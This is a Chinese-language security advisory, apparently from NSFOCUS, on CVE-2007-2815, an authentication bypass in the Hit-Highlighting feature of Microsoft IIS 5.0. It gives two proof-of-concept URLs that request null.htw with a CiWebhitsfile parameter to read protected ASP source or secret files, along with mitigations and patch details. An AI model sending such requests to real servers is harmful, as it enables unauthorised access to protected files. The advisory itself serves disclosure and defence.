安全研究

安全漏洞
Microsoft IIS Hit Highlighting功能绕过访问认证漏洞

发布日期:2007-05-22
更新日期:2007-05-23

受影响系统:
Microsoft IIS 5.0
不受影响系统:
Microsoft IIS 6.0
描述:
BUGTRAQ  ID: 24105
CVE(CAN) ID: CVE-2007-2815

Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。

Microsoft IIS在处理访问认证存在漏洞,远程攻击者可能利用此漏洞非授权访问文件。

IIS的Webhits.dll中所提供的Hit-highlighting功能仅依赖于Microsoft Windows NT ACL配置而不依赖于ISS认证配置。如果匿名用户能够通过恶意的URL请求向null.htw对象传送CiWebhitsfile参数的话,Hit-highlighting就可能返回该用户无权访问的受保护文档或ASP代码。

<*来源:Jesus Olmos Gonzalez (jolmos@isecauditors.com
  
  链接:http://marc.info/?l=bugtraq&m=117985681601889&w=2
        http://support.microsoft.com/kb/328832
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://www.example.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full
https://www.example.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 配置IIS,删除服务器对“.htw”文件映射。

* 使用URLScan工具过滤明显恶意的请求。

厂商补丁:

Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.microsoft.com/technet/security/

浏览次数:4447
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障